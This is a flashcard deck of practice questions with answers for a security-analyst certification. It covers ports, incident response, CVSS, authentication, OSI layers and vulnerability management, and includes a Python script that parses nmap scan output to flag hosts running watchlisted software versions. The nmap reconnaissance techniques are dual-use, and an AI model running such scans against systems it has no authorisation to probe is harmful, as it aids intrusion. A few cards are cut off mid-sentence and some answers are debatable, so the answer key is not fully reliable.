Assessment 1 Flashcards

1
Q

After running an nmap scan of a system, you receive scan data that indicates the following three ports are open:
22/TCP
443/TCP
1521/TCP
What services commonly run on these ports?
A. SMTP, NetBIOS, MS-SQL
B. SSH, LDAPS, LDAP
C. SSH, HTTPS, Oracle
D. FTP, HTTPS, MS-SQL

A

C. These three TCP ports are associated with SSH (22), HTTPS (443), and Oracle databases (1521). Other ports mentioned in the potential answers are SMTP (25), NetBIOS (137–139), LDAP (389), LDAPS (636), and MS-SQL (1433/1434).

2
Q

What type of system allows attackers to believe they have succeeded with their attack, thus providing defenders with information about their attack methods and tools?
A. A honeypot
B. A sinkhole
C. A crackpot
D. A darknet

A

A. Honeypots are systems that are designed to look like attractive targets. When they are attacked, they simulate a compromise, providing defenders with a chance to see how attackers operate and what tools they use. DNS sinkholes provide false information to malicious software, redirecting queries about command-and-control (C&C) systems to allow remediation. Darknets are segments of unused network space that are monitored to detect traffic—since legitimate traffic should never be aimed at the darknet, this can be used to detect attacks and other unwanted traffic. Crackpots are eccentric people—not a system you’ll run into on a network.

3
Q

What cybersecurity objective could be achieved by running your organization’s web servers in redundant, geographically separate datacenters?
A. Confidentiality
B. Integrity
C. Immutability
D. Availability

A

D. Redundant systems, particularly when run in multiple locations and with other protections to ensure uptime, can help provide availability.

4
Q

Which of the following vulnerability scanning methods will provide the most accurate detail during a scan?
A. Black box/unknown environment
B. Authenticated
C. Internal view
D. External view

A

B. An authenticated, or credentialed, scan provides the most detailed view of the system. Black-box assessments presume no knowledge of a system and would not have credentials or an agent to work with on the system. Internal views typically provide more detail than external views, but neither provides the same level of detail that credentials can allow. To learn more on this topic, see Chapter 6.

5
Q

Security researchers recently discovered a flaw in the Chakra JavaScript scripting engine in Microsoft’s Edge browser that could allow remote execution or denial of service via a specifically crafted website. The CVSS 3.1 score for this vulnerability reads:
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
What is the attack vector and the impact to integrity based on this rating?
A. System, 9, 8
B. Browser, High
C. Network, High
D. None, High

A

C. When reading the CVSS score, AV is the attack vector. Here, N means network. Confidentiality (C), integrity (I), and availability (A) are listed at the end of the listing, and all three are rated as High in this CVSS rating. To learn more on this topic, see Chapter 7.

6
Q

Alice is a security engineer tasked with performing vulnerability scans for her organization. She encounters a false positive error in one of her scans. What should she do about this?
A. Verify that it is a false positive, and then document the exception.
B. Implement a workaround.
C. Update the vulnerability scanner.
D. Use an authenticated scan, and then document the vulnerability

A

A. When Alice encounters a false positive error in her scans, her first action should be to verify it. This may involve running a more in-depth scan like an authenticated scan, but it could also involve getting assistance from system administrators, checking documentation, or other validation actions. Once she is done, she should document the exception so that it is properly tracked. Implementing a workaround is not necessary for false positive vulnerabilities, and updating the scanner should be done before every vulnerability scan. Using an authenticated scan might help but does not cover all the possibilities for validation she may need to use. To learn more on this topic, see Chapter 7.

7
Q

Which phase of the incident response process is most likely to include gathering additional evidence such as information that would support legal action?
A. Preparation
B. Detection and Analysis
C. Containment, Eradication, and Recovery
D. Post-incident Activity and Reporting

A

C. The Containment, Eradication, and Recovery phase of an incident includes steps to limit damage and document what occurred, including potentially identifying the attacker and tools used for the attack. This means that information useful to legal actions is most likely to be gathered during this phase. To learn more on this topic, see Chapter 9.

8
Q

Which of the following descriptions explains an integrity loss?
A. Systems were taken offline, resulting in a loss of business income.
B. Sensitive or proprietary information was changed or deleted.
C. Protected information was accessed or exfiltrated.
D. Sensitive personally identifiable information was accessed or exfiltrated.

A

B. Integrity breaches involve data being modified or deleted. Systems being taken offline is an availability issue, protected information being accessed might be classified as a breach of proprietary information, and sensitive personally identifiable information breaches would typically be classified as privacy breaches.

9
Q

Hui’s incident response program uses metrics to determine if their subscription to and use of IoC feeds is meeting the organization’s requirements. Which of the following incident response metrics is most useful if Hui wants to assess their use of IoC feeds?
A. Alert volume metrics
B. Mean time to respond metrics
C. Mean time to detect metrics
D. Mean time to remediate metrics

A

C. IoCs are used to improve detection, and Hui knows that gathering mean time to detect metrics will help the organization determine if their use of IoC feeds is improving detection speed. Alert volume is driven by configuration and maintenance of alerts, and it would not determine if the IoC usage was appropriate. Response time and remediation time are better used to measure the organization’s processes and procedures.

10
Q

Abdul’s monitoring detects regular traffic sent from a system that is suspected to be compromised and participating in a botnet to a set of remote IP addresses. What is this called?
A. Anomalous pings
B. Probing
C. Zombie chatter
D. Beaconing

A

D. Regular traffic from compromised systems to command-and-control nodes is known as beaconing. Anomalous pings could describe unexpected pings, but they are not typically part of botnet behavior, zombie chatter is a made-up term, and probing is part of scanning behavior in some cases. To learn more on this topic, see

11
Q

What industry standard is used to describe risk scores?
A. CRS
B. CVE
C. RSS
D. CVSS

A

D. The Common Vulnerability Scoring System, or CVSS, is used to rate and describe risks. CVE, Common Vulnerabilities and Exposures, classifies vulnerabilities. RSS, or Really Simple Syndication, is used to create feeds of websites. CRS was made up for this question. To learn more on this topic, see Chapter 12.

12
Q

What term is used to describe the retention of data and information related to pending or active litigation?
A. Preservation
B. Legal hold
C. Criminal hold
D. Forensic archiving

A

B. The term legal hold is used to describe the retention of data and information related to a pending or active legal investigation. Preservation is a broader term used to describe retention of data for any of a variety of reasons including business requirements. Criminal hold and forensic archiving were made up for this question. To learn more on this topic, see Chapter 13.

13
Q

During a forensic investigation Maria discovers evidence that a crime has been committed. What do organizations typically do to ensure that law enforcement can use data to prosecute a crime?
A. Securely wipe drives to prevent further issues
B. Document a chain of custody for the forensic data
C. Only perform forensic investigation on the original storage media
D. Immediately implement a legal hold

A

B. Documenting a proper chain of custody will allow law enforcement to be more likely to use forensic data successfully in court. Wiping drives will cause data loss, forensic examination is done on copies, not original drives, and legal holds are done to preserve data when litigation is occurring or may occur.

14
Q

Oscar’s manager has asked him to ensure that a compromised system has been completely purged of the compromise. What is Oscar’s best course of action?
A. Use an antivirus tool to remove any associated malware.
B. Use an antimalware tool to completely scan and clean the system.
C. Wipe and rebuild the system.
D. Restore a recent backup.

A

C. The most foolproof means of ensuring that a system does not remain compromised is to wipe and rebuild it. Without full knowledge of when the compromise occurred, restoring a backup may not help, and both antimalware and antivirus software packages cannot always ensure that no remnant of the compromise remains, particularly if the attacker created accounts or otherwise made changes that wouldn’t be detected as malicious software. To learn more on this topic, see Chapter 11.

15
Q

Which of the following actions is not a common activity during the recovery phase of an incident response process?
A. Reviewing accounts and adding new privileges
B. Validating that only authorized user accounts are on the systems
C. Verifying that all systems are logging properly
D. Performing vulnerability scans of all systems

A

A. The recovery phase does not typically seek to add new privileges. Validating that only legitimate accounts exist, that the systems are all logging properly, and that systems have been vulnerability scanned are all common parts of an incident response recovery phase. To learn more on this topic, see Chapter 11.

16
Q

A statement like “Windows workstations must have the current security configuration template applied to them before being deployed” is most likely to be part of which document?
A. Policies
B. Standards
C. Procedures
D. Guidelines

A

B. This statement is most likely to be part of a standard. Policies contain high-level statements of management intent; standards provide mandatory requirements for how policies are carried out, including statements like that provided in the question. A procedure would include the step-by-step process, and a guideline describes a best practice or recommendation. To learn more on this topic, see Chapter 8.

17
Q

A firewall is an example of what type of control?
A. Preventive
B. Detective
C. Responsive
D. Corrective

A

A. The main purpose of a firewall is to block malicious traffic before it enters a network, therefore preventing a security incident from occurring. For this reason, it is best classified as a preventive control. To learn more on this topic, see Chapter 8.

18
Q

Cathy wants to collect network-based indicators of compromise as part of her security monitoring practice. Which of the following is not a common network-related IoC?
A. Bandwidth consumption
B. Rogue devices on the network
C. Scheduled updates
D. Activity on unexpected ports

A

C. Scheduled updates are a normal activity on network-connected devices. Common indicators of potentially malicious activity include bandwidth consumption, beaconing, irregular peer-to-peer communication, rogue devices, scans, unusual traffic spikes, and activity on unexpected ports. To learn more on this topic, see Chapter 3.

19
Q

Nick wants to analyze a potentially malicious software package using an open source, locally hosted tool. Which of the following tools is best suited to his need if he wants to run the tool as part of the process?
A. Strings
B. A SIEM
C. VirusTotal
D. Cuckoo Sandbox

A

D. Cuckoo Sandbox is the only item from the list of potential answers that is a locally installed and run sandbox that analyzes potential malware by running it in a safe sandbox environment. To learn more on this topic, see Chapter 3.

20
Q

Which software development life cycle model uses linear development concepts in an iterative, four-phase process?
A. Waterfall
B. Agile
C. RAD
D. Spiral

A

D. The Spiral model uses linear development concepts like those used in Waterfall but repeats four phases through its life cycle: requirements gathering, design, build, and evaluation. To learn more on this topic

21
Q

Naomi wants to make her applications portable and easy to move to new environments without the overhead of a full operating system. What type of solution should she select?
A. An x86 architecture
B. Virtualization
C. Containerization
D. A SASE solution

A

C. Naomi should containerize her application. This will provide her with a lightweight option that can be moved between services and environments without requiring her to have an OS included in her container. Virtualization would include a full operating system. SASE is a solution for edge-focused security, whereas x86 is a hardware architecture.

22
Q

Bharath wants to make changes to the Windows Registry. What tool should he select?
A. regwiz.msc
B. notepad.exe
C. secpol.msc
D. regedit

A

D. The built-in Windows Registry editor is regedit. The secpol.msc tool is used to view and manage security policies. There is no regwiz tool, and Notepad, while handy, shouldn’t be used to try to edit the Registry!

23
Q

Tom wants to set an appropriate logging level for his Cisco networking equipment while he’s troubleshooting. What log level should he set?
A. 1
B. 3
C. 5
D. 7

A

D. Tom knows that log level 7 provides debugging messages that he will need during troubleshooting. Once he’s done, he’ll likely want to set a lower log level to ensure that he doesn’t create lots of noise in his logs.

24
Q

Which of the following is not a common use of network segmentation?
A. Decreasing attack surfaces
B. Limiting the scope of regulatory compliance
C. Reducing availability
D. Increasing the efficiency of a network

A

C. Segmentation is sometimes used to increase availability by reducing the potential impact of an attack or issue—intentionally reducing availability is unlikely to be a path chosen by most organizations.

25
Q

Ric’s organization wants to implement zero trust. What concern should Ric raise about zero trust implementations?
A. They can be complex to implement.
B. Zero trust does not support TLS inspection.
C. Zero trust is not compatible with modern software-defined networks.
D. They are likely to prevent users from accomplishing their jobs

A

A. Ric knows that zero trust can be complex to implement. Zero trust does not specifically prevent TLS inspection or conflict with SDN, and a successful zero trust implementation needs to validate user permissions but allow them to do their jobs.

26
Q

Michelle has a security token that her company issues to her. What type of authentication factor does she have?
A. Biometric
B. Possession
C. Knowledge
D. Inherence

A

B. Michelle’s security token is an example of a possession factor, or “something you have.” A password or PIN would be a knowledge factor or “something you know,” and a fingerprint or retina scan would be a biometric, or inherence, factor.

27
Q

Which party in a federated identity service model makes assertions about identities to service providers?
A. RPs
B. CDUs
C. IDPs
D. APs

A

C. Identity providers (IDPs) make assertions about identities to relying parties and service providers in a federation. CDUs and APs are not terms used in federated identity designs.

28
Q

What design concept requires that each action requested be verified and validated before it is allowed to occur?
A. Secure access service edge
B. Zero trust
C. Trust but verify
D. Extended validation network

A

B. Zero trust requires each action or use of privileges to be validated and verified before it is allowed to occur. Secure access service edge combines software-defined networking with other security products and services to control edge device security rather than requiring a secured central service or network. Trust but verify and extended validation network are not design concepts.

29
Q

Juan’s organization uses LDAP to allow users to log into a variety of services without having to type in their username and password again. What type of service is in use?
A. SSO
B. MFA
C. EDR
D. ZeroAuth

A

A. Juan’s organization is using a single sign-on (SSO) solution that allows users to sign in once and use multiple services. MFA is multifactor authentication; EDR is endpoint detection and response, an endpoint security tool; and ZeroAuth was made up for this question.

30
Q

Jen’s organization wants to ensure that administrator credentials are not used improperly.
What type of solution should Jen recommend to address this requirement?
A. SAML
B. CASB
C. PAM
D. PKI

A

C. A privileged access management (PAM) system would not only allow Jen’s organization to manage and monitor privilege use for administrator accounts but would be helpful for other privileges as well. SAML is an XML-based language used to send authorization and authentication data, a CASB is a cloud access security broker used to manage cloud access rights, and PKI is a public key infrastructure used to issue and manage security certificates.

31
Q

Financial and medical records are an example of what type of data?
A. CHD
B. PCI
C. PII
D. TS/SCI

A

C. Common examples of PII include financial records, addresses and phone numbers, and national or state identification numbers like Social Security numbers, passport numbers, and driver’s license numbers in the United States. CHD is cardholder data. PCI is the payment card industry, which defines the PCI DSS security standard. TS/SCI is a U.S. classification label standing for Top Secret/Sensitive Compartmented Information.

32
Q

Which of the following is not part of cardholder data for credit cards?
A. The cardholder’s name
B. The CVV code
C. The expiration date
D. The primary account number

A

B. The primary account number (PAN), the cardholder’s name, and the expiration date of the card are considered cardholder data. Sensitive authentication data includes the CVV code, the contents of the magnetic stripe and chip, and the PIN code if one is used.

33
Q

Sally wants to find configuration files for a Windows system. Which of the following is not a common configuration file location?
A. The Windows Registry
B. C:\Program Files\
C. C:\Windows\Temp
D. C:\ProgramData\

A

C. The temporary files directory is not a common location for configuration files for programs. Instead, the Registry, ProgramData, and Program Files directories are commonly used to store configuration information.

34
Q

What type of factor is a PIN?
A. A location factor
B. A biometric factor
C. A possession factor
D. A knowledge factor

A

D. A PIN is something you know and thus is a knowledge factor.

35
Q

What protocol is used to ensure that logs are time synchronized?
A. TTP
B. NTP
C. SAML
D. FTP

A

B. NTP (Network Time Protocol) is the underlying protocol used to ensure that systems are using synchronized time.

36
Q

OAuth, OpenID, SAML, and AD FS are all examples of what type of technology?
A. Federation
B. Multifactor authentication
C. Identity vetting
D. PKI

A

A. OAuth, OpenID, SAML, and AD FS are all examples of technologies used for federated identity. They aren’t MFA, identity vetting, or PKI technologies.

37
Q

Example Corporation has split their network into network zones that include sales, HR, research and development, and guest networks, each separated from the others using network security devices. What concept is Example Corporation using for their network security?
A. Segmentation
B. Software-defined networking
C. Single-point-of-failure avoidance
D. Zoned routing

A

A. Example Corporation is using segmentation, separating different risk or functional groupings. Software-defined networking is not mentioned, as no code-based changes or configurations are being made. There is nothing to indicate a single point of failure, and zoned routing was made up for this question—but the zone routing protocol is a network protocol used to maintain routes in a local network region.

38
Q

During a penetration test of Anna’s company, the penetration testers were able to compromise the company’s web servers and deleted their log files, preventing analysis of their attacks. What compensating control is best suited to prevent this issue in the future?
A. Using full-disk encryption
B. Using log rotation
C. Sending logs to a syslog server
D. Using TLS to protect traffic

A

C. Sending logs to a remote log server or bastion host is an appropriate compensating control. This ensures that copies of the logs exist in a secure location, allowing them to be reviewed if a similar compromise occurred. Full-disk encryption leaves files decrypted while in use and would not secure the log files from a compromise, whereas log rotation simply means that logs get changed out when they hit a specific size or time frame. TLS encryption for data (including logs) in transit can keep it private and prevent modification but wouldn’t protect the logs from being deleted.

39
Q

Ben is preparing a system hardening procedure for his organization. Which of the following is not a typical system hardening process or step?
A. Updating and patching systems
B. Enabling additional services
C. Enabling logging
D. Configuration disk encryption

A

B. Ben knows that hardening processes typically focus on disabling unnecessary services, not enabling additional services. Updating, patching, enabling logging, and configuring security capabilities like disk encryption are all common hardening practices.

40
Q

Gabby is designing a multifactor authentication system for her company. She has decided to use a passphrase, a time-based code generator, and a PIN to provide additional security. How many distinct factors will she have implemented when she is done?
A. One
B. Two
C. Three
D. Four

A

B. While it may seem like Gabby has implemented three different factors, both a PIN and a passphrase are knowledge-based factors and cannot be considered distinct factors. She has implemented two distinct factors with her design. If she wanted to add a third factor, she could replace either the password or the PIN with a fingerprint scan or other biometric factor.

41
Q

ports 20, 21

A

FTP

42
Q

22

A

SSH

43
Q

23

A

Telnet

44
Q

25

A

SMTP

45
Q

53

A

DNS

46
Q

80

A

HTTP

47
Q

110

A

POP3

48
Q

123

A

NTP

49
Q

143

A

IMAP

50
Q

389

A

LDAP

51
Q

443

A

HTTPS

52
Q

636

A

LDAPS

53
Q

1433

A

SQL Server

54
Q

1521

A

Oracle

55
Q

1723

A

PPTP

56
Q

3389

A

RDP

57
Q

During an incident response, you find that an employee’s workstation was infected with ransomware. What should be the first step in the incident response process?

A. Erase the affected workstation’s hard drive.
B. Isolate the affected workstation from the network.
C. Reinstall the operating system.
D. Notify all employees about the ransomware attack.

A

B. Isolate the affected workstation from the network.

58
Q

What type of vulnerability scan focuses on identifying misconfigurations and weak security settings in a network?

A. External scan
B. Internal scan
C. Baseline scan
D. Full scan

A

B. Internal scan

59
Q

Which log source is most likely to provide information about unauthorized access attempts to a network resource?

A. Application logs
B. Web server logs
C. System logs
D. Network device logs

A

D. Network device logs

60
Q

A company is assessing the likelihood and impact of potential security threats. What process are they engaged in?

A. Risk assessment
B. Vulnerability scanning
C. Penetration testing
D. Threat hunting

A

A. Risk assessment

61
Q

Which type of tool would you use to continuously monitor network traffic and provide alerts on suspicious activities?

A. IDS (Intrusion Detection System)
B. SIEM (Security Information and Event Management)
C. HIPS (Host-based Intrusion Prevention System)
D. DLP (Data Loss Prevention)

A

A. IDS (Intrusion Detection System)

62
Q

What is the primary purpose of implementing access control lists (ACLs) in a network?

A. To encrypt sensitive data in transit
B. To control which users and devices can access network resources
C. To monitor network traffic for anomalies
D. To patch known vulnerabilities in network devices

A

B. To control which users and devices can access network resources

63
Q

After analyzing a security incident, you find that an attacker exploited a vulnerability in an outdated software version. What should be done to mitigate this type of vulnerability in the future?

A. Install a firewall to block the attack.
B. Regularly update and patch software.
C. Disable the outdated software.
D. Use encryption to protect data.

A

B. Regularly update and patch software.

64
Q

What is the purpose of the OSI model in networking?

A. To define the standard hardware interfaces
B. To standardize the protocols used for network communication
C. To provide a framework for understanding network interactions and protocols
D. To determine the speed and bandwidth of the network

A

C. To provide a framework for understanding network interactions and protocols

65
Q

Which routing protocol uses DUAL (Diffusing Update Algorithm) to calculate the best path?

A. RIP
B. OSPF
C. EIGRP
D. BGP

A

C. EIGRP

66
Q

What is the purpose of a VLAN (Virtual Local Area Network)?

A. To segment network traffic into separate broadcast domains
B. To provide redundancy in case of a network failure
C. To increase the speed of data transmission over the network
D. To secure data by encrypting it during transmission

A

A. To segment network traffic into separate broadcast domains

67
Q

What is the primary function of an access control list (ACL) on a router?

A. To manage routing protocols and their updates
B. To control access to network resources based on IP addresses and protocols
C. To provide encryption for data transmission across the network
D. To monitor and analyze network traffic for performance issues

A

B. To control access to network resources based on IP addresses and protocols

68
Q

Which command can be used to display the IP routing table on a Cisco router?

A. show ip route
B. show interfaces
C. show running-config
D. show version

A

A. show ip route

69
Q

What does the acronym PPP stand for in networking?

A. Public Packet Protocol
B. Point-to-Point Protocol
C. Private Packet Protocol
D. Point-to-Point Process

A

B. Point-to-Point Protocol

70
Q

What port number is used by HTTP for web traffic?

A. 21
B. 22
C. 80
D. 443

A

C. 80

71
Q

What is the primary purpose of footprinting in the context of ethical hacking?

A. To exploit vulnerabilities in a target system
B. To gather information about a target system to identify potential security weaknesses
C. To install malware on a target system
D. To launch denial-of-service attacks

A

B. To gather information about a target system to identify potential security weaknesses

72
Q

Which tool is commonly used to perform network reconnaissance and identify live hosts, open ports, and services on a network?

A. Nmap
B. Metasploit
C. Burp Suite
D. Wireshark

A

A. Nmap

73
Q

Which of the following tools is commonly used for vulnerability scanning and analysis?

A. Nessus
B. Metasploit
C. Netcat
D. Aircrack-ng

A

A. Nessus

74
Q

What technique is used to gain unauthorized access to a system by exploiting weak or default passwords?

A. Social engineering
B. Password cracking
C. SQL injection
D. Denial-of-Service (DoS) attack

A

B. Password cracking

75
Q

What is the primary purpose of packet sniffing in a network security context?

A. To capture and analyze network traffic
B. To create and manage network firewalls
C. To perform penetration testing
D. To encrypt network communications

A

A. To capture and analyze network traffic

76
Q

Which type of social engineering attack involves tricking individuals into providing sensitive information by pretending to be someone they trust?

A. Phishing
B. Smishing
C. Vishing
D. Pretexting

A

D. Pretexting

77
Q

What is the purpose of a digital signature in cryptography?

A. To encrypt data during transmission
B. To ensure data integrity and verify the authenticity of the sender
C. To generate a random encryption key
D. To perform data compression

A

B. To ensure data integrity and verify the authenticity of the sender

78
Q

Physical Layer (Layer 1)

Function: Deals with the physical connection between devices, including the transmission of raw bit streams over a physical medium (cables, connectors, hubs and repeaters, and the electrical or optical signalling performed by network interface cards). Switches operate at Layer 2, not here.

A

Examples: Ethernet cables, fiber optics, and wireless radio frequencies.

79
Q

Data Link Layer (Layer 2)

Function: Responsible for framing and delivering data between two directly connected nodes on the same link. It handles physical (MAC) addressing, frame synchronization and error detection (for example the Ethernet frame check sequence); most link protocols discard a corrupted frame rather than correct it, leaving recovery to higher layers.

A

Examples: MAC addresses, Ethernet, and switches.

80
Q

Network Layer (Layer 3)

Function: Manages routing and forwarding of packets across networks. It determines the best path to send data from the source to the destination and handles logical addressing.

A

Examples: IP addresses, routers.

81
Q

Transport Layer (Layer 4)

Function: Provides end-to-end data transfer between processes on end systems, using port numbers to multiplex applications. Connection-oriented transport (TCP) adds reliable, in-order delivery with acknowledgements, retransmission and flow control; connectionless transport (UDP) provides none of these guarantees and leaves them to the application.

A

Examples: TCP (Transmission Control Protocol), UDP (User Datagram Protocol).

82
Q

Session Layer (Layer 5)

Function: Manages sessions or connections between applications. It establishes, maintains, and terminates connections and ensures that sessions are properly synchronized.

A

Examples: Session establishment protocols, APIs.

83
Q

Presentation Layer (Layer 6)

Function: Translates data between the application layer and the network format. It handles data encryption, decryption, compression, and translation.

A

Examples: Data formats and encodings such as ASCII/Unicode, JPEG and MPEG, plus encryption and compression. Textbooks commonly place SSL/TLS here, although TLS does not map cleanly onto a single OSI layer.

84
Q

Application Layer (Layer 7)

Function: Provides network services directly to end-user applications. It supports application services such as email, file transfer, and web browsing.

A

Examples: HTTP, FTP, SMTP, DNS.

85
Q

What is open source intelligence (OSINT)?

A

Open Source Intelligence (OSINT) refers to the process of collecting and analyzing publicly available information to support decision-making, investigation, or analysis. This information can come from a wide range of sources, including:

Internet Resources: Websites, social media platforms, blogs, forums, and online news articles.
Public Records: Government databases, court records, and public filings.
Media: Newspapers, television, radio broadcasts, and other forms of media.
Academic and Research Publications: Journals, research papers, and other scholarly work.
Commercial Data: Market research reports, business directories, and industry reports.

86
Q

What is defensive OSINT?

A

Defensive OSINT is a proactive approach to security, aiming to stay ahead of potential threats by leveraging publicly available information to strengthen defenses and mitigate risks.
Here are some key aspects of defensive OSINT:

Threat Detection
Vulnerability Assessment
Reputation Management
Incident Response
Security Awareness

87
Q

What is CERT?

A

CERT stands for Computer Emergency Response Team. It’s a specialized group that provides expertise and support in managing and responding to cybersecurity incidents and threats. The key functions and roles of a CERT include:
Incident Response: Assisting organizations in identifying, managing, and mitigating cybersecurity incidents such as breaches, malware infections, and other types of cyberattacks. CERTs often provide guidance on how to contain and recover from these incidents.

Threat Intelligence: Gathering, analyzing, and disseminating information about current and emerging threats to help organizations understand and defend against potential risks. This can involve sharing information about vulnerabilities, attack patterns, and trends.

Security Advice and Best Practices: Offering recommendations and guidelines on improving cybersecurity practices and policies to help organizations strengthen their defenses and reduce the risk of incidents.

Coordination and Collaboration: Working with other CERTs, government agencies, law enforcement, and private sector organizations to coordinate responses to large-scale or complex incidents and to share information about threats and vulnerabilities.

Training and Awareness: Providing training and resources to help organizations and individuals understand cybersecurity risks and implement effective security measures. This can include workshops, seminars, and educational materials.

Research and Development: Conducting research to develop new tools, techniques, and methodologies for detecting, preventing, and responding to cyber threats.

88
Q

When assessing risks to your organization’s IT infrastructure, which framework allows for prioritization based on the potential impact of threats?
a) NIST’s Cybersecurity Framework
b) OWASP Top 10
c) Center for Internet Security (CIS) Top 20 Critical Security Controls
d) ISO 31000

A

a) NIST’s Cybersecurity Framework

The NIST Cybersecurity Framework provides a structured approach to managing and prioritizing cybersecurity risks based on the potential impact of threats. It includes components for identifying, protecting, detecting, responding to, and recovering from cybersecurity incidents, helping organizations focus on the most critical areas of their IT infrastructure.

89
Q

Among the following strategies for dealing with multiple known vulnerabilities, which one is deemed MOST crucial for their successful management and mitigation?
a) The number of vulnerabilities
b) Prioritizing the risk level associated with each vulnerability
c) The type of vulnerabilities
d) The location of vulnerabilities

A

b) Prioritizing the risk level associated with each vulnerability

Prioritizing vulnerabilities based on their risk level—considering factors like potential impact, exploitability, and the criticality of affected systems—is essential for effective management and mitigation. This approach helps ensure that resources are allocated to address the most significant threats first, reducing the overall risk to the organization.

90
Q

How could a company’s reluctance to interrupt its business processes potentially impact its vulnerability management?
a) Increasing the company’s overall market share
b) Enhancing the effectiveness of the company’s marketing strategies
c) Boosting employee productivity during work hours
d) Leading to postponed or overlooked system updates and patches

A

d) Leading to postponed or overlooked system updates and patches

When a company is hesitant to disrupt its business processes, it might delay or skip necessary system updates and security patches to avoid interruptions. This can leave vulnerabilities unaddressed, increasing the risk of security breaches and compromising the overall effectiveness of its vulnerability management efforts.

91
Q

Why is it crucial for an organization to conduct regular vulnerability management reporting?
a) Boosts the company’s stock price
b) Improves employee morale
c) Helps in identifying and prioritizing the system vulnerabilities
d) Increases the number of customers

A

c) Helps in identifying and prioritizing the system vulnerabilities

Regular vulnerability management reporting allows an organization to systematically identify and assess the security weaknesses in its systems. By continuously monitoring and reporting on vulnerabilities, the organization can prioritize them based on their risk levels, ensuring that the most critical issues are addressed promptly and effectively. This proactive approach helps in maintaining a robust security posture and mitigating potential threats.

92
Q

If you want to conduct an operating system identification during an nmap scan, which syntax should you utilize?
a) nmap -os
b) nmap -O
c) nmap -id
d) nmap -osscan

A

b) nmap -O

The -O option in Nmap enables OS detection, which attempts to determine the operating system of the target system based on various network characteristics.

93
Q

Dion Training conducts weekly vulnerability scanning of their network and patches any identified issues within 24 hours. Which of the following best describes the company’s risk response strategy?
a) Avoidance
b) Acceptance
c) Mitigation
d) Transference

A

c) Mitigation

Mitigation involves taking steps to reduce the impact or likelihood of identified risks. By conducting weekly vulnerability scans and promptly patching any issues within 24 hours, Dion Training is actively working to reduce their security vulnerabilities and manage risk effectively.

94
Q

Which of the following methods can be used to identify affected hosts in a system?
(Choose THREE)
a) Using BitLocker
b) Use a vulnerability scanner to scan the system for known vulnerabilities.
c) Use a packet sniffer to monitor network traffic for signs of exploitation.
d) Use a network scanner to scan the network for hosts that are running vulnerable software.

A

To identify affected hosts in a system, you can use the following methods:

b) Use a vulnerability scanner to scan the system for known vulnerabilities.

c) Use a packet sniffer to monitor network traffic for signs of exploitation.

d) Use a network scanner to scan the network for hosts that are running vulnerable software.

Each of these methods helps in identifying hosts that may be vulnerable or compromised in different ways:

Vulnerability scanners look for known vulnerabilities in systems and applications.
Packet sniffers can detect signs of exploitation by analyzing network traffic.
Network scanners identify hosts on the network and can detect if they are running software with known vulnerabilities.
BitLocker is not used for identifying affected hosts; it is the full-disk encryption feature built into Windows and protects data at rest.
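Cards 72, 92 and 94 describe using a network scanner to find live hosts, open ports, service versions and (with -O) operating systems, and then picking out the hosts running flagged software. The following is an added example, not code from nmap or from this deck's source: it parses nmap's grepable (-oG) output format and matches service banners against a watchlist. The scan output, host names and the watchlist versions are constructed for illustration.

```python
"""Parse nmap grepable (-oG) output and flag hosts whose service banners match a
watchlist of flagged versions. Added example for this deck, not code from nmap;
the scan output and the watchlist are constructed for illustration."""
import re

# Constructed sample of "nmap -sV -O -oG" output. Each Ports: entry has the layout
# port/state/protocol/owner/service/rpcinfo/version/ and a "/" inside a field is written as "|".
# The OS: field is only present when the scan was run with -O.
SCAN = """\
# Nmap 7.94 scan initiated as: nmap -sV -O -oG scan.gnmap 10.0.0.0/29
Host: 10.0.0.5 (db1.corp.example)\tStatus: Up
Host: 10.0.0.5 (db1.corp.example)\tPorts: 22/open/tcp//ssh//OpenSSH 7.4/, 1521/open/tcp//oracle-tns//Oracle TNS listener/\tIgnored State: closed (998)\tOS: Linux 3.10
Host: 10.0.0.6 (web1.corp.example)\tStatus: Up
Host: 10.0.0.6 (web1.corp.example)\tPorts: 80/open/tcp//http//Apache httpd 2.4.49/, 443/open/tcp//ssl|http//Apache httpd 2.4.49/\tIgnored State: filtered (998)\tOS: Linux 4.15
Host: 10.0.0.7 ()\tStatus: Up
Host: 10.0.0.7 ()\tPorts: 22/open/tcp//ssh//OpenSSH 9.3/\tIgnored State: closed (999)
# Nmap done at Mon Oct 14 09:12:01 2024 -- 8 IP addresses (3 hosts up) scanned
"""

HOST_RE = re.compile(r"^Host: (?P<ip>\S+) \((?P<name>[^)]*)\)\t(?P<rest>.*)$")

# Placeholder watchlist (product -> versions your vulnerability feed has flagged).
WATCHLIST = {"OpenSSH": {"7.4"}, "Apache httpd": {"2.4.49"}}


def parse_gnmap(text):
    """Return {ip: {"name": str, "os": str or None, "ports": [dict, ...]}}."""
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comment lines and the "Nmap done" footer
        entry = hosts.setdefault(m.group("ip"), {"name": m.group("name"), "os": None, "ports": []})
        # The remaining tab-separated fields are "Key: value" pairs.
        fields = dict(f.split(": ", 1) for f in m.group("rest").split("\t") if ": " in f)
        if "OS" in fields:
            entry["os"] = fields["OS"]
        for spec in fields.get("Ports", "").split(", "):
            if not spec:
                continue
            port, state, proto, _owner, service, _rpc, version = spec.split("/")[:7]
            entry["ports"].append({"port": int(port), "state": state, "proto": proto,
                                   "service": service.replace("|", "/"), "version": version})
    return hosts


def affected_hosts(hosts, watchlist=WATCHLIST):
    """List (ip, port, banner) for every open port whose banner matches a flagged version."""
    hits = []
    for ip, entry in hosts.items():
        for p in entry["ports"]:
            if p["state"] != "open":
                continue
            for product, versions in watchlist.items():
                if p["version"].startswith(product + " "):
                    version = p["version"][len(product) + 1:].split()[0]
                    if version in versions:
                        hits.append((ip, p["port"], p["version"]))
    return sorted(hits)


if __name__ == "__main__":
    scanned = parse_gnmap(SCAN)
    for ip, entry in scanned.items():
        print(ip, entry["name"] or "-", entry["os"] or "os unknown",
              [f'{p["port"]}/{p["proto"]} {p["service"]}' for p in entry["ports"]])
    for ip, port, banner in affected_hosts(scanned):
        print(f"FLAGGED {ip}:{port} {banner}")
```

Banner matching is a first pass, not a verdict: version strings are self-reported, and distribution packages often keep an old upstream version number while carrying backported fixes, so a hit from this script should be confirmed with an authenticated vulnerability scan or the package's changelog before it is reported as affected.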

95
Q

What is Threat Hunting?

A

Threat hunting in cybersecurity is a proactive approach to identifying and mitigating potential security threats within an organization’s network. Unlike traditional methods that rely on automated tools and reactive measures, threat hunting involves actively searching for signs of malicious activity or security breaches that may not be detected by standard defenses.

